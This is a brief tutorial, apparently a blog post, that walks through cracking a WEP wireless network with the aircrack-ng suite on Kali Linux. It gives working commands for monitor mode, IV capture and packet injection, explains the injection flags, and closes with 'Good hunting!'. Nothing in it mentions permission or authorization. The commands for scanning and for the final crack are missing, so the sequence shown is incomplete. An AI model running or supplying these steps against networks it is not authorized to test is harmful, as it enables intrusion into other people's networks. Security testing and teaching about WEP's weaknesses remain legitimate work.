The following is a quick-hit list of commands for attacking a WEP wireless network. It assumes you are using a 2016 variant of Kali linux with the aircrack-ng suite installed and a wireless network card that can be placed into monitor mode (which should be about 100% of them). It also assumes that there is a WEP network with an associated client that is transmitting, and that you are running as a user with sufficient permissions to execute each of these commands.
For the sake of this tutorial the AP will be assumed to have a MAC address of “DE:AD:DE:AD:DE:AD” and the client will be assumed to have a MAC address of “BE:AD:ED:BE:AD:ED”. The wireless network card we will use will be assumed to be “wlan0”.
UPDATE 2017-01-01: If a presentation is more your style of learning you can access training on this topic here: Wireless Attacks – WEP (basic_0x00)
First up, boot up Kali and shut down any potentially interfering programs:
airmon-ng check kill
Then put the interface into monitor mode:
airmon-ng start wlan0
Next up, find the target WEP network:
Make sure to note the client (BE:AD:ED:BE:AD:ED for our example), the AP (DE:AD:DE:AD:DE:AD for our example), and the channel (10 for our example), then exit airodump-ng with CTRL+C. Now restart airodump-ng to capture the IVs for the network:
airodump-ng --channel 10 --bssid DE:AD:DE:AD:DE:AD -w wep-capture --ivs wlan0mon
Leave that running, then jump over to a new window/terminal and start injecting to stimulate IV creation. We’ll use a modified packet approach, since that’s a bit easier to find:
aireplay-ng -2 -b DE:AD:DE:AD:DE:AD -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 wlan0mon
To break that down a bit:
- -2 means modified packet attack
- -b means the AP address
- -t 1 means to look for a candidate packet that has to “To Distribution System” value set
- -c means the destination address (broadcast in this case)
- -p 0841 means to set the “To Distribution” flag
Now in a third window/terminal start the crack:
Select the target network, and let it sit. It will automatically poll the capture file and keep trying as thresholds are reached until the key is recovered. Remember that you need to try both “Open” and “Shared” key types as well as each key number to properly join the target network. Good hunting!